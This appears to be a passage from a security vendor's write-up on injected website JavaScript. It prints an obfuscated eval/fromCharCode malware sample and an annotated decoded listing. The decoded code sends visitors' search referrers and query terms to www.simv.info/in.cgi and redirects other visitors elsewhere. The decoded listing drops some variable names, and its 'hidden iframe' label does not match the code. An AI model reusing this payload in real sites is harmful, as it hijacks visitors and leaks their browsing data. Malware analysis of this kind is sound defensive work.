  // is set (one day, path '/') before zzzfff() is called. Re-test from a clean
  // browser profile when checking whether a site is still infected.
  36. if (navigator.cookieEnabled)
  37. {
          // == compares the cookie string '55' with the number 55 loosely.
  38.     if (GetCookie('visited_uq') == 55) {} else {
  39.         SetCookie('visited_uq', '55', '1', '/');
  40.         zzzfff();
  41.     }
  42. }


Sample 9

  1. eval(String.fromCharCode(107, 49, 61, 34, 107, 101, 108, 108, 121, 43, 98, 108, 117, 101, 43, 98, 111, 111, 107,34, 59, 114, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 114, 101, 102, 101, 114, 114, 101, 114, 59, 117, 61,100, 111, 99, 117, 109, 101, 110, 116, 46, 85, 82, 76, 59, 116, 61, 34, 34, 59, 115, 101, 61, 34, 117, 110, 107,110, 111, 119, 110, 34, 59, 32, 13, 10, 102, 117, 110, 99, 116, 105, 111, 110, 32, 97, 40, 99, 44, 100, 44, 101,41, 123, 105, 102, 40, 114, 46, 105, 110, 100, 101, 120, 79, 102, 40, 99, 41, 33, 61, 45, 49, 41, 123, 116, 61,100, 59, 115, 101, 61, 101, 59, 125, 125, 32, 13, 10, 97, 40, 34, 103, 111, 111, 103, 108, 101, 46, 34, 44, 34,113, 34, 44, 34, 103, 111, 111, 103, 108, 101, 34, 41, 59, 32, 13, 10, 97, 40, 34, 109, 115, 110, 46, 34, 44, 34,113, 34, 44, 34, 109, 115, 110, 34, 41, 59, 32, 13, 10, 97, 40, 34, 121, 97, 104, 111, 111, 46, 34, 44, 34, 112,34, 44, 34, 121, 97, 104, 111, 111, 34, 41, 59, 32, 13, 10, 97, 40, 34, 97, 108, 116, 97, 118, 105, 115, 116, 97,46, 34, 44, 34, 113, 34, 44, 34, 97, 108, 116, 97, 118, 105, 115, 116, 97, 34, 41, 59, 32, 13, 10, 97, 40, 34, 97,111, 108, 46, 34, 44, 34, 113, 117, 101, 114, 121, 34, 44, 34, 97, 111, 108, 34, 41, 59, 32, 13, 10, 97, 40, 34,97, 115, 107, 46, 34, 44, 34, 113, 34, 44, 34, 97, 115, 107, 34, 41, 59, 32, 13, 10, 97, 40, 34, 101, 117, 114,101, 107, 97, 46, 99, 111, 109, 46, 34, 44, 34, 113, 34, 44, 34, 101, 117, 114, 101, 107, 97, 46, 99, 111, 109,34, 41, 59, 32, 13, 10, 97, 40, 34, 108, 121, 99, 111, 115, 46, 99, 111, 109, 46, 34, 44, 34, 113, 117, 101, 114,121, 34, 44, 34, 108, 121, 99, 111, 115, 34, 41, 59, 32, 13, 10, 97, 40, 34, 104, 111, 116, 98, 111, 116, 46, 99,111, 109, 46, 34, 44, 34, 77, 84, 34, 44, 34, 104, 111, 116, 98, 111, 116, 34, 41, 59, 32, 13, 10, 97, 40, 34,105, 110, 102, 111, 115, 101, 101, 107, 46, 99, 111, 109, 46, 34, 44, 34, 113, 116, 34, 44, 34, 105, 110, 102,111, 115, 101, 101, 107, 46, 99, 111, 109, 34, 41, 59, 32, 13, 10, 97, 40, 34, 119, 101, 98, 
99, 114, 97, 119,108, 101, 114, 46, 34, 44, 34, 115, 101, 97, 114, 99, 104, 84, 101, 120, 116, 34, 44, 34, 119, 101, 98, 99, 114,97, 119, 108, 101, 114, 34, 41, 59, 32, 13, 10, 97, 40, 34, 101, 120, 99, 105, 116, 101, 46, 34, 44, 34, 115, 101,97, 114, 99, 104, 34, 44, 34, 101, 120, 99, 105, 116, 101, 34, 41, 59, 32, 13, 10, 97, 40, 34, 110, 101, 116, 115,99, 97, 112, 101, 46, 99, 111, 109, 46, 34, 44, 34, 115, 101, 97, 114, 99, 104, 34, 44, 34, 110, 101, 116, 115,99, 97, 112, 101, 34, 41, 59, 32, 13, 10, 97, 40, 34, 109, 97, 109, 109, 97, 46, 99, 111, 109, 46, 34, 44, 34,113, 117, 101, 114, 121, 34, 44, 34, 109, 97, 109, 109, 97, 34, 41, 59, 32, 13, 10, 97, 40, 34, 97, 108, 108, 116,104, 101, 119, 101, 98, 46, 99, 111, 109, 46, 34, 44, 34, 113, 117, 101, 114, 121, 34, 44, 34, 97, 108, 108, 116,104, 101, 119, 101, 98, 46, 99, 111, 109, 34, 41, 59, 32, 13, 10, 97, 40, 34, 110, 111, 114, 116, 104, 101, 114,110, 108, 105, 103, 104, 116, 46, 99, 111, 109, 46, 34, 44, 34, 113, 114, 34, 44, 34, 110, 111, 114, 116, 104,101, 114, 110, 108, 105, 103, 104, 116, 46, 99, 111, 109, 34, 41, 59, 32, 13, 10, 13, 10, 105, 102, 40, 116, 46,108, 101, 110, 103, 116, 104, 38, 38, 40, 40, 113, 61, 114, 46, 105, 110, 100, 101, 120, 79, 102, 40, 34, 63, 34,43, 116, 43, 34, 61, 34, 41, 41, 33, 61, 45, 49, 124, 124, 40, 113, 61, 114, 46, 105, 110, 100, 101, 120, 79, 102,40, 34, 38, 34, 43, 116, 43, 34, 61, 34, 41, 41, 33, 61, 45, 49, 41, 41, 123, 13, 10, 107, 61, 114, 46, 115, 117,98, 115, 116, 114, 105, 110, 103, 40, 113, 43, 50, 43, 116, 46, 108, 101, 110, 103, 116, 104, 41, 46, 115, 112,108, 105, 116, 40, 34, 38, 34, 41, 91, 48, 93, 46, 115, 112, 108, 105, 116, 40, 34, 43, 34, 41, 46, 106, 111, 105,110, 40, 34, 37, 50, 48, 34, 41, 46, 115, 112, 108, 105, 116, 40, 34, 37, 50, 48, 34, 41, 46, 106, 111, 105, 110,40, 34, 37, 50, 66, 34, 41, 59, 13, 10, 103, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 115, 105,109, 118, 46, 105, 110, 102, 111, 47, 105, 110, 46, 99, 103, 105, 63, 
50, 38, 72, 84, 84, 80, 95, 82, 69, 70, 69,82, 69, 82, 61, 34, 43, 107, 43, 34, 59, 34, 43, 101, 110, 99, 111, 100, 101, 85, 82, 73, 67, 111, 109, 112, 111,110, 101, 110, 116, 40, 117, 41, 43, 34, 59, 34, 43, 115, 101, 43, 34, 59, 34, 43, 114, 43, 34, 59, 34, 43, 34,38, 117, 114, 61, 49, 38, 112, 97, 114, 97, 109, 101, 116, 101, 114, 61, 34, 43, 107, 49, 59, 13, 10, 119, 105,110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 103, 59, 125, 13, 10, 101, 108, 115, 101, 123,119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47,97, 98, 111, 117, 116, 46, 104, 97, 117, 116, 101, 116, 102, 111, 114, 116, 46, 99, 111, 109, 34, 59, 125));


Malicious action:  injecting hidden iframe to either  www.simv.info/in.cgi or http://about.hautetfort.com

  // [analysis] Decoded form of Sample 9: state used by the redirect logic.
  // NOTE(review): the single-letter variable names on lines 2-4 are missing in
  // this listing; the character-code form above decodes to
  // r = document.referrer, u = document.URL and t = "".
  // k1 is a fixed keyword string that is appended to the redirect URL on line 30.
  1. k1 = "kelly+blue+book";
  2. = document.referrer;
  3. = document.URL;
  4. = "";
     // Search-engine label; stays "unknown" unless a() matches the referrer.
  5. se = "unknown";
  // [analysis] Referrer matcher. When the referrer (r) contains the substring
  // c, remember d in t and e in se. Judging by the calls that follow, c is a
  // search-engine host fragment, d the name of that engine's query parameter
  // and e a label for the engine. A later matching call overwrites an earlier
  // one.
  6. function a(c, d, e) {
  7.     if (r.indexOf(c) != -1) {
  8.         t = d;
  9.         se = e;
  10.     }
  11. }
  // [analysis] Main logic of Sample 9: classify the referrer against a list of
  // search engines, then navigate the whole page away.
  // NOTE(review): as listed, both branches assign window.location, i.e. a
  // top-level redirect of the visitor; no iframe is created here, although
  // the label above the listing calls it a hidden iframe.
  12. a("google.", "q", "google");
  13. a("msn.", "q", "msn");
  14. a("yahoo.", "p", "yahoo");
  15. a("altavista.", "q", "altavista");
  16. a("aol.", "query", "aol");
  17. a("ask.", "q", "ask");
  18. a("eureka.com.", "q", "eureka.com");
  19. a("lycos.com.", "query", "lycos");
  20. a("hotbot.com.", "MT", "hotbot");
  21. a("infoseek.com.", "qt", "infoseek.com");
  22. a("webcrawler.", "searchText", "webcrawler");
  23. a("excite.", "search", "excite");
  24. a("netscape.com.", "search", "netscape");
  25. a("mamma.com.", "query", "mamma");
  26. a("alltheweb.com.", "query", "alltheweb.com");
  27. a("northernlight.com.", "qr", "northernlight.com");
      // Search-engine branch: taken when a query parameter name was recorded
      // and "?<t>=" or "&<t>=" occurs in the referrer. The variable receiving
      // the index is missing in this listing (q in the character-code form).
  28. if (t.length && ((= r.indexOf("?" + t + "=")) != -1 || (= r.indexOf("&" + t + "=")) != -1)) {
          // k = the visitor's search terms: the text after "<t>=" up to the
          // next "&", with "+" turned into "%20" and every "%20" into "%2B".
  29.     k = r.substring(+ 2 + t.length).split("&")[0].split("+").join("%20").split("%20").join("%2B");
          // The destination URL carries the search terms, the encoded address
          // of the infected page (u), the engine label, the raw referrer and
          // k1, so this data is disclosed to the third-party host.
  30.     g = "http://www.simv.info/in.cgi?2&HTTP_REFERER=" + k + ";" + encodeURIComponent(u) + ";" + se + ";" + r + ";"+ "&ur=1&parameter=" + k1;
  31.     window.location = g;
  32. } else {
          // Every other visitor (direct visit, unlisted referrer) is sent here.
          // When reproducing the infection, note that visitors arriving from a
          // search result and direct visitors are sent to different places.
  33.     window.location = "http://about.hautetfort.com";
  34. }

Summary

Scanning your website for hidden iframes and other invisible threats can save you the headache of getting removed from a blacklist later. It helps you avoid traffic loss in the early stages of an attack!
Successful attacks are usually made possible by website owners neglecting security best practices.

Malware clean-up


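Such malware is often hidden inside the website's JavaScript files. If you suspect that your website was infected by similar malware, please use Website Anti-malware Monitoring for real-time anti-malware monitoring and for remediation assessment. Because the injected code sits in the site's own files, removing it is only part of the clean-up: unless you also find out how those files were modified and close that path, the injection is likely to return.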